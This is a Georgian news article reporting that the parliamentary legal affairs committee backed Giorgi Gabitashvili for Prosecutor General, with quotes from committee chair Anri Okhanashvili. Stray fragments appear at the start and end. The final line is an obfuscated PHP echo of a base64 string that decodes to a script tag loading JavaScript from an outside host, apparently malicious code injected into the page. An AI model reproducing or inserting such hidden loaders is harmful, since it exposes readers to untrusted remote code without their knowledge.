celsiusi
ავერსი შნაიდერი

იურიდიულ საკითხთა კომიტეტმა გენერალური პროკურორის პოსტზე გიორგი გაბიტაშვილის არჩევას მხარი დაუჭირა.

იურიდიულ საკითხთა კომიტეტის თავმჯდომარე, ანრი ოხანაშვილი გამოვიდა ინიციატივით, რომ პლენარულ სხდომაზე განხილვის გარეშე წარმართულიყო გიორგი გაბიტაშვილის არჩევასთან დაკავშირებით კენჭისყრის პროცედურა. მის ამ ინიციატივას იურიდიულ საკითხმა მხარი დაუჭირა.

„გთავაზობთ კენჭი ვუყაროთ დასკვნას, რომ დადებითი რეკომენდაცია დღესვე გაეგზავნოს პლენარულ სხდომას და პლენარულ სხდომაზე მოხდეს განხილვის გარეშე კენჭისყრის პროცედურის წარმართვა“, - განაცხადა ოხანაშვილმა.

ამასთან, მან გიორგი გაბიტაშვილს მიმართა და იმედი გამოთქვა, რომ ის თავის საქმიანობას კეთილსინდისიერად შეასრულებს.

„იურიდიულ საკითხთა კომიტეტის მხრიდან თქვენ გამოცხადებული გაქვთ ნდობა, რომ თქვენ არჩეული იყოთ საქართველოს გენერალურ პროკურორად პარლამენტის პლენარულ სხდომაზე. ვფიქრობთ, თქვენი ხედვით, განვლილი პროფესიული საქმიანობით თქვენ კეთილსინდისიერად, მაღალი პროფესიონალიზმით, კანონის სრული დაცვით შეასრულებთ თქვენთვის დაკისრებულ უფლება-მოვალეობებს. ჩვენი საზრუნავი და მიზანია, მაქსიმალურად გქონდეთ შესაძლებლობა, საუკეთესო კადრებთან ერთად იმუშაოთ შემდგომშიც, რომელიც საქართველოს პროკურატურის სისტემაში მრავლადაა“, - მიმართა ოხანაშვილმა გაბიტაშვილს.

გარდა ამისა, ანრი ოხანაშვილის განცხადებით, იმედი ჰქონდა, რომ იურიდიულ საკითხთა კომიტეტის სხდომაზე ოპოზიციის წარმომადგენლები შეკითხვებს დასვამდნენ. „დღეს ჩვენ გვქონდა შესაძლებლობა, ასევე მოგვესმინა ოპოზიციის წარმომადგენლების შეკითხვები, მათ შორის კეთილსინდისიერებასთან დაკავშირებით, რომელსაც ისინი კამერების წინ ამბობენ კონკრეტულ საკითხებთან დაკავშირებით. მართალია, არიან ცალკეული ოპოზიციონერი დეპუტატები, თუმცა სხვები, რომლებიც განსაკუთრებით გამოირჩევიან ხოლმე არასწორი ინფორმაციის და დეზინფორმაციის გავრცელებით, გვქონდა მოლოდინი, რომ მოვიდოდნენ და შეკითხვებს დასვამდნენ. თუმცა, ჩვენ ასეთი რამ არ ვიხილეთ. ეს კიდევ ერთხელ მიანიშნებს იმას, რომ გიორგი გაბიტაშვილის განვლილი პროფესიული საქმიანობა მას კეთილსინდისიერად და მისი კომპეტენციის ფარგლებში აქვს განხორციელებული, რაც საკმარის საფუძველს ქმნის იმისთვის, რომ ჩვენ ამ კრიტერიუმის საფუძვლის გათვალისწინებით, დადებითი გადაწყვეტილება მივიღოთ“, - განაცხადა ოხანაშვილმა.

142
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");